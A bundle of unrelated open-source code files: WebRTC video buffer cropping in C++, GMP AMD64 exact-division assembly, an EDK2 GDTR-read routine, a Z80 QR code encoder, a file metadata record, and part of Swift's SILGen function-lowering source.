int WrappedI420Buffer::width() const {
return width_;
}
int WrappedI420Buffer::height() const {
return height_;
}
const uint8_t* WrappedI420Buffer::data(PlaneType type) const {
switch (type) {
case kYPlane:
return y_plane_;
case kUPlane:
return u_plane_;
case kVPlane:
return v_plane_;
default:
RTC_NOTREACHED();
return nullptr;
}
}
int WrappedI420Buffer::stride(PlaneType type) const {
switch (type) {
case kYPlane:
return y_stride_;
case kUPlane:
return u_stride_;
case kVPlane:
return v_stride_;
default:
RTC_NOTREACHED();
return 0;
}
}
void* WrappedI420Buffer::native_handle() const {
return nullptr;
}
rtc::scoped_refptr<VideoFrameBuffer> WrappedI420Buffer::NativeToI420Buffer() {
RTC_NOTREACHED();
return nullptr;
}
rtc::scoped_refptr<VideoFrameBuffer> ShallowCenterCrop(
const rtc::scoped_refptr<VideoFrameBuffer>& buffer,
int cropped_width,
int cropped_height) {
RTC_CHECK(buffer->native_handle() == nullptr);
RTC_CHECK_LE(cropped_width, buffer->width());
RTC_CHECK_LE(cropped_height, buffer->height());
if (buffer->width() == cropped_width && buffer->height() == cropped_height)
return buffer;
// Center crop to |cropped_width| x |cropped_height|.
// Make sure offset is even so that u/v plane becomes aligned.
const int uv_offset_x = (buffer->width() - cropped_width) / 4;
const int uv_offset_y = (buffer->height() - cropped_height) / 4;
const int offset_x = uv_offset_x * 2;
const int offset_y = uv_offset_y * 2;
const uint8_t* y_plane = buffer->data(kYPlane) +
buffer->stride(kYPlane) * offset_y + offset_x;
const uint8_t* u_plane = buffer->data(kUPlane) +
buffer->stride(kUPlane) * uv_offset_y + uv_offset_x;
const uint8_t* v_plane = buffer->data(kVPlane) +
buffer->stride(kVPlane) * uv_offset_y + uv_offset_x;
return new rtc::RefCountedObject<WrappedI420Buffer>(
cropped_width, cropped_height,
y_plane, buffer->stride(kYPlane),
u_plane, buffer->stride(kUPlane),
v_plane, buffer->stride(kVPlane),
rtc::Bind(&NoLongerUsedCallback, buffer));
}
} // namespace webrtc
|
dnl AMD64 mpn_divexact_1 -- mpn by limb exact division.
dnl Copyright 2001, 2002, 2004-2006, 2010-2012 Free Software Foundation, Inc.
dnl This file is part of the GNU MP Library.
dnl
dnl The GNU MP Library is free software; you can redistribute it and/or modify
dnl it under the terms of either:
dnl
dnl * the GNU Lesser General Public License as published by the Free
dnl Software Foundation; either version 3 of the License, or (at your
dnl option) any later version.
dnl
dnl or
dnl
dnl * the GNU General Public License as published by the Free Software
dnl Foundation; either version 2 of the License, or (at your option) any
dnl later version.
dnl
dnl or both in parallel, as here.
dnl
dnl The GNU MP Library is distributed in the hope that it will be useful, but
dnl WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
dnl or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
dnl for more details.
dnl
dnl You should have received copies of the GNU General Public License and the
dnl GNU Lesser General Public License along with the GNU MP Library. If not,
dnl see https://www.gnu.org/licenses/.
include(`../config.m4')
C cycles/limb
C norm unorm
C AMD K8,K9 11 11
C AMD K10 11 11
C Intel P4 ?
C Intel core2 13.5 13.25
C Intel corei 14.25
C Intel atom 34 36
C VIA nano 19.25 19.25
C INPUT PARAMETERS
C rp rdi
C up rsi
C n rdx
C divisor rcx
ABI_SUPPORT(DOS64)
ABI_SUPPORT(STD64)
ASM_START()
TEXT
ALIGN(16)
PROLOGUE(mpn_divexact_1)
FUNC_ENTRY(4)
push %rbx
mov %rcx, %rax
xor R32(%rcx), R32(%rcx) C shift count
mov %rdx, %r8
bt $0, R32(%rax)
jc L(odd) C skip bsfq unless divisor is even
bsf %rax, %rcx
shr R8(%rcx), %rax
L(odd): mov %rax, %rbx
shr R32(%rax)
and $127, R32(%rax) C d/2, 7 bits
LEA( binvert_limb_table, %rdx)
movzbl (%rdx,%rax), R32(%rax) C inv 8 bits
mov %rbx, %r11 C d without twos
lea (%rax,%rax), R32(%rdx) C 2*inv
imul R32(%rax), R32(%rax) C inv*inv
imul R32(%rbx), R32(%rax) C inv*inv*d
sub R32(%rax), R32(%rdx) C inv = 2*inv - inv*inv*d, 16 bits
lea (%rdx,%rdx), R32(%rax) C 2*inv
imul R32(%rdx), R32(%rdx) C inv*inv
imul R32(%rbx), R32(%rdx) C inv*inv*d
sub R32(%rdx), R32(%rax) C inv = 2*inv - inv*inv*d, 32 bits
lea (%rax,%rax), %r10 C 2*inv
imul %rax, %rax C inv*inv
imul %rbx, %rax C inv*inv*d
sub %rax, %r10 C inv = 2*inv - inv*inv*d, 64 bits
lea (%rsi,%r8,8), %rsi C up end
lea -8(%rdi,%r8,8), %rdi C rp end
neg %r8 C -n
mov (%rsi,%r8,8), %rax C up[0]
inc %r8
jz L(one)
test R32(%rcx), R32(%rcx)
jnz L(unorm) C branch if count != 0
xor R32(%rbx), R32(%rbx)
jmp L(nent)
ALIGN(8)
L(ntop):mul %r11 C carry limb in rdx 0 10
mov -8(%rsi,%r8,8), %rax C
sub %rbx, %rax C apply carry bit
setc %bl C
sub %rdx, %rax C apply carry limb 5
adc $0, %rbx C 6
L(nent):imul %r10, %rax C 6
mov %rax, (%rdi,%r8,8) C
inc %r8 C
jnz L(ntop)
mov -8(%rsi), %r9 C up high limb
jmp L(com)
L(unorm):
mov (%rsi,%r8,8), %r9 C up[1]
shr R8(%rcx), %rax C
neg R32(%rcx)
shl R8(%rcx), %r9 C
neg R32(%rcx)
or %r9, %rax
xor R32(%rbx), R32(%rbx)
jmp L(uent)
ALIGN(8)
L(utop):mul %r11 C carry limb in rdx 0 10
mov (%rsi,%r8,8), %rax C
shl R8(%rcx), %rax C
neg R32(%rcx)
or %r9, %rax
sub %rbx, %rax C apply carry bit
setc %bl C
sub %rdx, %rax C apply carry limb 5
adc $0, %rbx C 6
L(uent):imul %r10, %rax C 6
mov (%rsi,%r8,8), %r9 C
shr R8(%rcx), %r9 C
neg R32(%rcx)
mov %rax, (%rdi,%r8,8) C
inc %r8 C
jnz L(utop)
L(com): mul %r11 C carry limb in rdx
sub %rbx, %r9 C apply carry bit
sub %rdx, %r9 C apply carry limb
imul %r10, %r9
mov %r9, (%rdi)
pop %rbx
FUNC_EXIT()
ret
L(one): shr R8(%rcx), %rax
imul %r10, %rax
mov %rax, (%rdi)
pop %rbx
FUNC_EXIT()
ret
EPILOGUE()
|
;------------------------------------------------------------------------------
;
; Copyright (c) 2006, Intel Corporation. All rights reserved.<BR>
; This program and the accompanying materials
; are licensed and made available under the terms and conditions of the BSD License
; which accompanies this distribution. The full text of the license may be found at
; http://opensource.org/licenses/bsd-license.php.
;
; THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
; WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
;
; Module Name:
;
; ReadGdtr.Asm
;
; Abstract:
;
; AsmReadGdtr function
;
; Notes:
;
;------------------------------------------------------------------------------
.386
.model flat,C
.code
;------------------------------------------------------------------------------
; VOID
; EFIAPI
; InternalX86ReadGdtr (
; OUT IA32_DESCRIPTOR *Gdtr
; );
;------------------------------------------------------------------------------
InternalX86ReadGdtr PROC
mov eax, [esp + 4]
sgdt fword ptr [eax]
ret
InternalX86ReadGdtr ENDP
END
|
; https://github.com/leiradel/qrc1
; ------------------------------------------------------------------------
; Macros for some undocumented Z80 instructions.
; ------------------------------------------------------------------------
addixl: macro
db $dd
add a, l
endm
ldixh_a: macro
db $dd
ld h, a
endm
decixh: macro
db $dd
dec h
endm
decixl: macro
db $dd
dec l
endm
; qrc11_message contains a $40 byte followed by the message length followed
; by the message (maximum 251 bytes).
qrc11_encmessage:
; ------------------------------------------------------------------------
; Encode the message.
; ------------------------------------------------------------------------
; Insert a 0000 nibble to before the length
ld hl, qrc11_message + 1
ld c, (hl)
xor a
; Shift the message to the right by four bits.
ld b, c
inc b
qrc11_shift_msg:
rrd
inc hl
djnz qrc11_shift_msg
; A has the low nibble of the last message byte, shift it to the high
; nibble and set the low nibble to 0, which is the end of message mark.
ld (hl), 0
rrd
inc hl
; Pad the rest of the message with $ec and $11.
ld a, 251
sub c
jr z, qrc11_no_padding
ld b, a
ld a, $ec
qrc11_pad_msg:
ld (hl), a
inc hl
xor $fd
djnz qrc11_pad_msg
qrc11_no_padding:
; ------------------------------------------------------------------------
; Calculate the message ECC.
; ------------------------------------------------------------------------
; Copy each block of the original encoded message to the target buffer,
; the ECC evaluation will overwrite it so we need to restore it at the end.
ld hl, qrc11_block1
ld de, qrc11_b1
ld bc, 50
call qrc11_ecc
ld hl, qrc11_block2
ld de, qrc11_b2
ld bc, 51
call qrc11_ecc
ld hl, qrc11_block3
ld de, qrc11_b3
ld bc, 51
call qrc11_ecc
ld hl, qrc11_block4
ld de, qrc11_b4
ld bc, 51
call qrc11_ecc
ld hl, qrc11_block5
ld de, qrc11_b5
ld bc, 51
call qrc11_ecc
; ------------------------------------------------------------------------
; Interleave message and ecc blocks.
; ------------------------------------------------------------------------
qrc11_interleave:
ld hl, qrc11_b1
ld de, qrc11_message
ld a, 50
qrc11_dintl:
call qrc11_dint
ld bc, qrc11_b1 - qrc11_b5
add hl, bc
dec a
jr nz, qrc11_dintl
ld hl, qrc11_b2 + 50
ldi
ld hl, qrc11_b3 + 50
ldi
ld hl, qrc11_b4 + 50
ldi
ld hl, qrc11_b5 + 50
ldi
ld hl, qrc11_b1_ecc
ld a, 30
qrc11_eintl:
call qrc11_eint
ld bc, qrc11_b1_ecc - qrc11_b5_ecc
add hl, bc
dec a
jr nz, qrc11_eintl
; ------------------------------------------------------------------------
; Display QR code with checkerboard mask.
; ------------------------------------------------------------------------
ld hl, qrc11_map
ld c, 61
qrc11_d1:
ld b, 61
qrc11_d2: push bc
ld e, (hl)
inc hl
ld d, (hl)
inc hl
ld a, e
and 7
srl d
rr e
srl d
rr e
srl d
rr e
ld bc, qrc11_message
ex de, hl
add hl, bc
ex de, hl
ld b, a
ld a, (de)
inc b
qrc11_d3: rlca
djnz qrc11_d3
pop bc
xor b
xor c
rrca
call nc, qrc11_module
djnz qrc11_d2
dec c
jr nz, qrc11_d1
ret
; ------------------------------------------------------------------------
; Interleave bytes.
; ------------------------------------------------------------------------
qrc11_eint:
ldi
ld bc, 50 + 30
jr qrc11_int
qrc11_dint:
ldi
ld bc, 49 + 30
qrc11_int:
add hl, bc
ldi
ld c, 50 + 30
add hl, bc
ldi
ld c, 50 + 30
add hl, bc
ldi
ld c, 50 + 30
add hl, bc
ldi
ret
; ------------------------------------------------------------------------
; Calculate the block ECC.
; ------------------------------------------------------------------------
qrc11_ecc:
; Save block parameters for restoring
push hl
push de
push bc
; Save message block length for later
push bc
; Save message block address for later
push de
ldir
; Zero the 30 bytes where the ECC will be stored.
xor a
ld b, 30
qrc11_zero_ecc:
ld (de), a
inc de
djnz qrc11_zero_ecc
; HL is the polynomial A.
pop hl
; IXL is the outer loop counter (i) for the length of A.
pop ix
qrc11_loop_i:
; Save HL as it'll be incremented in the inner loop.
push hl
; Save A[i] in B to be used inside the inner loop.
ld b, (hl)
; DE is the polynomial B.
ld de, qrc11_ecc_poly
; Evaluate the inner loop count limit.
ld a, 31
addixl
dec a
; IXH is inner loop counter (j) up to length(A) - i.
ldixh_a
qrc11_loop_j:
; A is B[j]
ld a, (de)
; Save DE as we'll use D and E in the gf_mod loop.
push de
; D is A[i], E is the gf_mod result.
ld d, b
ld e, 0
; A is x, D is y, E is r, C is a scratch register.
jr qrc11_test_y
qrc11_xor_res:
; y had the 0th bit set, r ^= x.
ld c, a
xor e
ld e, a
ld a, c
qrc11_dont_xor:
; x <<= 1, set carry if x >= 256.
add a, a
jr nc, qrc11_test_y
; x was >= 256, xor it with the module.
xor 285 - 256
qrc11_test_y:
; y >>= 1, update r if the 0th bit is set, end the loop if
; it's zero.
srl d
jr c, qrc11_xor_res
jr nz, qrc11_dont_xor
; A[i + j] ^= gf_mod(...)
ld a, (hl)
xor e
ld (hl), a
; Restore DE.
pop de
; Update HL and DE to point to the next bytes of A and B.
inc hl
inc de
; Inner loop test.
decixh
jr nz, qrc11_loop_j
; Restore HL since it was changed in the inner loop, and make it point
; to the next byte in A.
pop hl
inc hl
; Outer loop test.
decixl
jr nz, qrc11_loop_i
; Restore the original encoded message, since the loops above zero it.
pop bc
pop de
pop hl
ldir
ret
; The ECC version 11 level M polynomial.
qrc11_ecc_poly:
db 1, 212, 246, 77, 73, 195, 192, 75, 98, 5, 70, 103, 177, 22, 217, 138
db 51, 181, 246, 72, 25, 18, 46, 228, 74, 216, 195, 11, 106, 130, 150
ds 51
; The message, it'll be encoded in place.
qrc11_message:
qrc11_block1:
db $40
db 0 ; Message length
ds 48 ; Message source
qrc11_block2:
ds 51 ; Message source
qrc11_block3:
ds 51 ; Message source
qrc11_block4:
ds 51 ; Message source
qrc11_block5:
ds 51 ; Message source
; Extra space for encoded message
ds 30 * 5
; Fidex white and black modules
db $40
qrc11_b1:
ds 50 ; Message target
qrc11_b1_ecc:
ds 30 ; Computed ECC
qrc11_b2:
ds 51 ; Message target
qrc11_b2_ecc:
ds 30 ; Computed ECC
qrc11_b3:
ds 51 ; Message target
qrc11_b3_ecc:
ds 30 ; Computed ECC
qrc11_b4:
ds 51 ; Message target
qrc11_b4_ecc:
ds 30 ; Computed ECC
qrc11_b5:
ds 51 ; Message target
qrc11_b5_ecc:
ds 30 ; Computed ECC
|
Name: mn_hp_smsub0.asm
Type: file
Size: 117589
Last-Modified: '1993-08-25T07:36:08Z'
SHA-1: 5CEFDF104B5612100CE778789D8B0E1147C1FC01
Description: null
|
//===--- SILGenFunction.cpp - Top-level lowering for functions ------------===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
//
// This file defines the primary routines for creating and emitting
// functions.
//
//===----------------------------------------------------------------------===//
#include "SILGenFunction.h"
#include "RValue.h"
#include "SILGenFunctionBuilder.h"
#include "Scope.h"
#include "swift/ABI/MetadataValues.h"
#include "swift/AST/ClangModuleLoader.h"
#include "swift/AST/DiagnosticsSIL.h"
#include "swift/AST/FileUnit.h"
#include "swift/AST/GenericEnvironment.h"
#include "swift/AST/Initializer.h"
#include "swift/AST/ParameterList.h"
#include "swift/AST/PropertyWrappers.h"
#include "swift/AST/SourceFile.h"
#include "swift/SIL/SILArgument.h"
#include "swift/SIL/SILProfiler.h"
#include "swift/SIL/SILUndef.h"
using namespace swift;
using namespace Lowering;
//===----------------------------------------------------------------------===//
// SILGenFunction Class implementation
//===----------------------------------------------------------------------===//
SILGenFunction::SILGenFunction(SILGenModule &SGM, SILFunction &F,
DeclContext *DC)
: SGM(SGM), F(F), silConv(SGM.M), FunctionDC(DC),
StartOfPostmatter(F.end()), B(*this),
CurrentSILLoc(F.getLocation()), Cleanups(*this),
StatsTracer(SGM.M.getASTContext().Stats,
"SILGen-function", &F) {
assert(DC && "creating SGF without a DeclContext?");
B.setInsertionPoint(createBasicBlock());
B.setCurrentDebugScope(F.getDebugScope());
}
/// SILGenFunction destructor - called after the entire function's AST has been
/// visited. This handles "falling off the end of the function" logic.
SILGenFunction::~SILGenFunction() {
// If the end of the function isn't terminated, we screwed up somewhere.
assert(!B.hasValidInsertionPoint() &&
"SILGenFunction did not terminate function?!");
// If we didn't clean up the rethrow destination, we screwed up somewhere.
assert(!ThrowDest.isValid() &&
"SILGenFunction did not emit throw destination");
}
//===----------------------------------------------------------------------===//
// Function emission
//===----------------------------------------------------------------------===//
// Get the #function name for a declaration.
DeclName SILGenModule::getMagicFunctionName(DeclContext *dc) {
// For closures, use the parent name.
if (auto closure = dyn_cast<AbstractClosureExpr>(dc)) {
return getMagicFunctionName(closure->getParent());
}
if (auto absFunc = dyn_cast<AbstractFunctionDecl>(dc)) {
// If this is an accessor, use the name of the storage.
if (auto accessor = dyn_cast<AccessorDecl>(absFunc))
return accessor->getStorage()->getName();
if (auto func = dyn_cast<FuncDecl>(absFunc)) {
// If this is a defer body, use the parent name.
if (func->isDeferBody()) {
return getMagicFunctionName(func->getParent());
}
}
return absFunc->getName();
}
if (auto init = dyn_cast<Initializer>(dc)) {
return getMagicFunctionName(init->getParent());
}
if (auto nominal = dyn_cast<NominalTypeDecl>(dc)) {
return nominal->getName();
}
if (auto tl = dyn_cast<TopLevelCodeDecl>(dc)) {
return tl->getModuleContext()->getName();
}
if (auto fu = dyn_cast<FileUnit>(dc)) {
return fu->getParentModule()->getName();
}
if (auto m = dyn_cast<ModuleDecl>(dc)) {
return m->getName();
}
if (auto e = dyn_cast<ExtensionDecl>(dc)) {
assert(e->getExtendedNominal() && "extension for nonnominal");
return e->getExtendedNominal()->getName();
}
if (auto EED = dyn_cast<EnumElementDecl>(dc)) {
return EED->getName();
}
if (auto SD = dyn_cast<SubscriptDecl>(dc)) {
return SD->getName();
}
llvm_unreachable("unexpected #function context");
}
DeclName SILGenModule::getMagicFunctionName(SILDeclRef ref) {
switch (ref.kind) {
case SILDeclRef::Kind::Func:
if (auto closure = ref.getAbstractClosureExpr())
return getMagicFunctionName(closure);
return getMagicFunctionName(cast<FuncDecl>(ref.getDecl()));
case SILDeclRef::Kind::Initializer:
case SILDeclRef::Kind::Allocator:
return getMagicFunctionName(cast<ConstructorDecl>(ref.getDecl()));
case SILDeclRef::Kind::Deallocator:
case SILDeclRef::Kind::Destroyer:
return getMagicFunctionName(cast<DestructorDecl>(ref.getDecl()));
case SILDeclRef::Kind::GlobalAccessor:
return getMagicFunctionName(cast<VarDecl>(ref.getDecl())->getDeclContext());
case SILDeclRef::Kind::DefaultArgGenerator:
return getMagicFunctionName(cast<DeclContext>(ref.getDecl()));
case SILDeclRef::Kind::StoredPropertyInitializer:
case SILDeclRef::Kind::PropertyWrapperBackingInitializer:
return getMagicFunctionName(cast<VarDecl>(ref.getDecl())->getDeclContext());
case SILDeclRef::Kind::PropertyWrapperInitFromProjectedValue:
return getMagicFunctionName(cast<VarDecl>(ref.getDecl())->getDeclContext());
case SILDeclRef::Kind::IVarInitializer:
return getMagicFunctionName(cast<ClassDecl>(ref.getDecl()));
case SILDeclRef::Kind::IVarDestroyer:
return getMagicFunctionName(cast<ClassDecl>(ref.getDecl()));
case SILDeclRef::Kind::EnumElement:
return getMagicFunctionName(cast<EnumElementDecl>(ref.getDecl())
->getDeclContext());
case SILDeclRef::Kind::AsyncEntryPoint:
case SILDeclRef::Kind::EntryPoint:
auto *file = ref.getDecl()->getDeclContext()->getParentSourceFile();
return getMagicFunctionName(file);
}
llvm_unreachable("Unhandled SILDeclRefKind in switch.");
}
std::tuple<ManagedValue, SILType>
SILGenFunction::emitSiblingMethodRef(SILLocation loc,
SILValue selfValue,
SILDeclRef methodConstant,
SubstitutionMap subMap) {
SILValue methodValue;
// If the method is dynamic, access it through runtime-hookable virtual
// dispatch (viz. objc_msgSend for now).
if (methodConstant.hasDecl()
&& methodConstant.getDecl()->shouldUseObjCDispatch()) {
methodValue =
emitDynamicMethodRef(
loc, methodConstant,
SGM.Types.getConstantInfo(getTypeExpansionContext(), methodConstant)
.SILFnType)
.getValue();
} else {
methodValue = emitGlobalFunctionRef(loc, methodConstant);
}
SILType methodTy = methodValue->getType();
// Specialize the generic method.
methodTy =
methodTy.substGenericArgs(SGM.M, subMap, getTypeExpansionContext());
return std::make_tuple(ManagedValue::forUnmanaged(methodValue),
methodTy);
}
void SILGenFunction::emitCaptures(SILLocation loc,
SILDeclRef closure,
CaptureEmission purpose,
SmallVectorImpl<ManagedValue> &capturedArgs) {
auto captureInfo = SGM.Types.getLoweredLocalCaptures(closure);
// For boxed captures, we need to mark the contained variables as having
// escaped for DI diagnostics.
SmallVector<SILValue, 2> escapesToMark;
// Partial applications take ownership of the context parameters, so we'll
// need to pass ownership rather than merely guaranteeing parameters.
bool canGuarantee;
bool captureCanEscape = true;
switch (purpose) {
case CaptureEmission::PartialApplication:
canGuarantee = false;
break;
case CaptureEmission::ImmediateApplication:
canGuarantee = true;
break;
case CaptureEmission::AssignByWrapper:
canGuarantee = false;
captureCanEscape = false;
break;
}
auto expansion = getTypeExpansionContext();
for (auto capture : captureInfo.getCaptures()) {
if (capture.isDynamicSelfMetadata()) {
// The parameter type is the static Self type, but the value we
// want to pass is the dynamic Self type, so upcast it.
auto dynamicSelfMetatype = MetatypeType::get(
captureInfo.getDynamicSelfType());
SILType dynamicSILType = getLoweredType(dynamicSelfMetatype);
SILValue value = B.createMetatype(loc, dynamicSILType);
capturedArgs.push_back(ManagedValue::forUnmanaged(value));
continue;
}
if (capture.isOpaqueValue()) {
OpaqueValueExpr *opaqueValue = capture.getOpaqueValue();
capturedArgs.push_back(
emitRValueAsSingleValue(opaqueValue).ensurePlusOne(*this, loc));
continue;
}
auto *vd = cast<VarDecl>(capture.getDecl());
auto type = FunctionDC->mapTypeIntoContext(
vd->getInterfaceType());
auto valueType = FunctionDC->mapTypeIntoContext(
vd->getValueInterfaceType());
//
// If we haven't emitted the captured value yet, we're forming a closure
// to a local function before all of its captures have been emitted. Eg,
//
// func f() { g() } // transitive capture of 'x'
// f() // closure formed here
// var x = 123 // 'x' defined here
// func g() { print(x) } // 'x' captured here
//
auto found = VarLocs.find(vd);
if (found == VarLocs.end()) {
auto &Diags = getASTContext().Diags;
SourceLoc loc;
if (closure.kind == SILDeclRef::Kind::DefaultArgGenerator) {
auto *param = getParameterAt(closure.getDecl(),
closure.defaultArgIndex);
loc = param->getLoc();
} else {
auto f = *closure.getAnyFunctionRef();
loc = f.getLoc();
}
Diags.diagnose(loc, diag::capture_before_declaration,
vd->getBaseIdentifier());
Diags.diagnose(vd->getLoc(), diag::captured_value_declared_here);
Diags.diagnose(capture.getLoc(), diag::value_captured_here);
// Emit an 'undef' of the correct type.
switch (SGM.Types.getDeclCaptureKind(capture, expansion)) {
case CaptureKind::Constant:
capturedArgs.push_back(emitUndef(getLoweredType(type)));
break;
case CaptureKind::Immutable:
case CaptureKind::StorageAddress:
capturedArgs.push_back(emitUndef(getLoweredType(type).getAddressType()));
break;
case CaptureKind::Box: {
auto boxTy = SGM.Types.getContextBoxTypeForCapture(
vd,
SGM.Types.getLoweredRValueType(TypeExpansionContext::minimal(),
type),
FunctionDC->getGenericEnvironmentOfContext(),
/*mutable*/ true);
capturedArgs.push_back(emitUndef(boxTy));
break;
}
}
continue;
}
// Get an address value for a SILValue if it is address only in an type
// expansion context without opaque archetype substitution.
auto getAddressValue = [&](SILValue entryValue) -> SILValue {
if (SGM.Types
.getTypeLowering(
valueType,
TypeExpansionContext::noOpaqueTypeArchetypesSubstitution(
expansion.getResilienceExpansion()))
.isAddressOnly() &&
!entryValue->getType().isAddress()) {
auto addr = emitTemporaryAllocation(vd, entryValue->getType());
auto val = B.emitCopyValueOperation(vd, entryValue);
auto &lowering = getTypeLowering(entryValue->getType());
lowering.emitStore(B, vd, val, addr, StoreOwnershipQualifier::Init);
entryValue = addr;
enterDestroyCleanup(addr);
}
return entryValue;
};
auto Entry = found->second;
switch (SGM.Types.getDeclCaptureKind(capture, expansion)) {
case CaptureKind::Constant: {
// let declarations.
auto &tl = getTypeLowering(valueType);
SILValue Val = Entry.value;
if (!Val->getType().isAddress()) {
// Our 'let' binding can guarantee the lifetime for the callee,
// if we don't need to do anything more to it.
if (canGuarantee && !vd->getInterfaceType()->is<ReferenceStorageType>()) {
auto guaranteed = ManagedValue::forUnmanaged(Val).borrow(*this, loc);
capturedArgs.push_back(guaranteed);
break;
}
// Just retain a by-val let.
Val = B.emitCopyValueOperation(loc, Val);
} else {
// If we have a mutable binding for a 'let', such as 'self' in an
// 'init' method, load it.
Val = emitLoad(loc, Val, tl, SGFContext(), IsNotTake).forward(*this);
}
// If we're capturing an unowned pointer by value, we will have just
// loaded it into a normal retained class pointer, but we capture it as
// an unowned pointer. Convert back now.
if (vd->getInterfaceType()->is<ReferenceStorageType>())
Val = emitConversionFromSemanticValue(loc, Val, getLoweredType(type));
capturedArgs.push_back(emitManagedRValueWithCleanup(Val));
break;
}
case CaptureKind::Immutable: {
if (canGuarantee) {
auto entryValue = getAddressValue(Entry.value);
// No-escaping stored declarations are captured as the
// address of the value.
assert(entryValue->getType().isAddress() && "no address for captured var!");
capturedArgs.push_back(ManagedValue::forLValue(entryValue));
}
else {
auto entryValue = getAddressValue(Entry.value);
// We cannot pass a valid SILDebugVariable while creating the temp here
// See rdar://60425582
auto addr = B.createAllocStack(loc, entryValue->getType().getObjectType());
enterDeallocStackCleanup(addr);
B.createCopyAddr(loc, entryValue, addr, IsNotTake, IsInitialization);
capturedArgs.push_back(ManagedValue::forLValue(addr));
}
break;
}
case CaptureKind::StorageAddress: {
auto entryValue = getAddressValue(Entry.value);
// No-escaping stored declarations are captured as the
// address of the value.
assert(entryValue->getType().isAddress() && "no address for captured var!");
capturedArgs.push_back(ManagedValue::forLValue(entryValue));
break;
}
case CaptureKind::Box: {
auto entryValue = getAddressValue(Entry.value);
// LValues are captured as both the box owning the value and the
// address of the value.
assert(entryValue->getType().isAddress() && "no address for captured var!");
// Boxes of opaque return values stay opaque.
auto minimalLoweredType = SGM.Types.getLoweredRValueType(
TypeExpansionContext::minimal(), type->getCanonicalType());
// If this is a boxed variable, we can use it directly.
if (Entry.box &&
entryValue->getType().getASTType() == minimalLoweredType) {
// We can guarantee our own box to the callee.
if (canGuarantee) {
capturedArgs.push_back(
ManagedValue::forUnmanaged(Entry.box).borrow(*this, loc));
} else {
capturedArgs.push_back(emitManagedRetain(loc, Entry.box));
}
if (captureCanEscape)
escapesToMark.push_back(entryValue);
} else {
// Address only 'let' values are passed by box. This isn't great, in
// that a variable captured by multiple closures will be boxed for each
// one. This could be improved by doing an "isCaptured" analysis when
// emitting address-only let constants, and emit them into an alloc_box
// like a variable instead of into an alloc_stack.
//
// TODO: This might not be profitable anymore with guaranteed captures,
// since we could conceivably forward the copied value into the
// closure context and pass it down to the partially applied function
// in-place.
// TODO: Use immutable box for immutable captures.
auto boxTy = SGM.Types.getContextBoxTypeForCapture(
vd, minimalLoweredType, FunctionDC->getGenericEnvironmentOfContext(),
/*mutable*/ true);
AllocBoxInst *allocBox = B.createAllocBox(loc, boxTy);
ProjectBoxInst *boxAddress = B.createProjectBox(loc, allocBox, 0);
B.createCopyAddr(loc, entryValue, boxAddress, IsNotTake,
IsInitialization);
if (canGuarantee)
capturedArgs.push_back(
emitManagedRValueWithCleanup(allocBox).borrow(*this, loc));
else
capturedArgs.push_back(emitManagedRValueWithCleanup(allocBox));
}
break;
}
}
}
// Mark box addresses as captured for DI purposes. The values must have
// been fully initialized before we close over them.
if (!escapesToMark.empty()) {
B.createMarkFunctionEscape(loc, escapesToMark);
}
}
ManagedValue
SILGenFunction::emitClosureValue(SILLocation loc, SILDeclRef constant,
CanType expectedType,
SubstitutionMap subs,
bool alreadyConverted) {
auto loweredCaptureInfo = SGM.Types.getLoweredLocalCaptures(constant);
auto constantInfo = getConstantInfo(getTypeExpansionContext(), constant);
SILValue functionRef = emitGlobalFunctionRef(loc, constant, constantInfo);
SILType functionTy = functionRef->getType();
// Apply substitutions.
auto pft = constantInfo.SILFnType;
auto closure = *constant.getAnyFunctionRef();
auto *dc = closure.getAsDeclContext()->getParent();
if (dc->isLocalContext() && !loweredCaptureInfo.hasGenericParamCaptures()) {
// If the lowered function type is not polymorphic but we were given
// substitutions, we have a closure in a generic context which does not
// capture generic parameters. Just drop the substitutions.
subs = { };
} else if (closure.getAbstractClosureExpr()) {
// If we have a closure expression in generic context, Sema won't give
// us substitutions, so we just use the forwarding substitutions from
// context.
subs = getForwardingSubstitutionMap();
}
bool wasSpecialized = false;
if (!subs.empty()) {
auto specialized =
pft->substGenericArgs(F.getModule(), subs, getTypeExpansionContext());
functionTy = SILType::getPrimitiveObjectType(specialized);
wasSpecialized = true;
}
// If we're in top-level code, we don't need to physically capture script
// globals, but we still need to mark them as escaping so that DI can flag
// uninitialized uses.
if (this == SGM.TopLevelSGF) {
auto captureInfo = closure.getCaptureInfo();
SGM.emitMarkFunctionEscapeForTopLevelCodeGlobals(
loc, captureInfo);
}
if (loweredCaptureInfo.getCaptures().empty() && !wasSpecialized) {
auto result = ManagedValue::forUnmanaged(functionRef);
if (!alreadyConverted)
result = emitOrigToSubstValue(loc, result,
AbstractionPattern(expectedType),
expectedType);
return result;
}
SmallVector<ManagedValue, 4> capturedArgs;
emitCaptures(loc, constant, CaptureEmission::PartialApplication,
capturedArgs);
// The partial application takes ownership of the context parameters.
SmallVector<SILValue, 4> forwardedArgs;
for (auto capture : capturedArgs)
forwardedArgs.push_back(capture.forward(*this));
auto calleeConvention = ParameterConvention::Direct_Guaranteed;
auto toClosure =
B.createPartialApply(loc, functionRef, subs, forwardedArgs,
calleeConvention);
auto result = emitManagedRValueWithCleanup(toClosure);
// Get the lowered AST types:
// - the original type
auto origFormalType = AbstractionPattern(constantInfo.LoweredType);
// - the substituted type
auto substFormalType = expectedType;
// Generalize if necessary.
if (!alreadyConverted)
result = emitOrigToSubstValue(loc, result, origFormalType,
substFormalType);
return result;
}
void SILGenFunction::emitFunction(FuncDecl *fd) {
MagicFunctionName = SILGenModule::getMagicFunctionName(fd);
auto captureInfo = SGM.M.Types.getLoweredLocalCaptures(SILDeclRef(fd));
emitProfilerIncrement(fd->getTypecheckedBody());
emitProlog(captureInfo, fd->getParameters(), fd->getImplicitSelfDecl(), fd,
fd->getResultInterfaceType(), fd->hasThrows(), fd->getThrowsLoc());
if (fd->isDistributedActorFactory()) {
// Synthesize the factory function body
emitDistributedActorFactory(fd);
} else {
prepareEpilog(fd->getResultInterfaceType(),
fd->hasThrows(), CleanupLocation(fd));
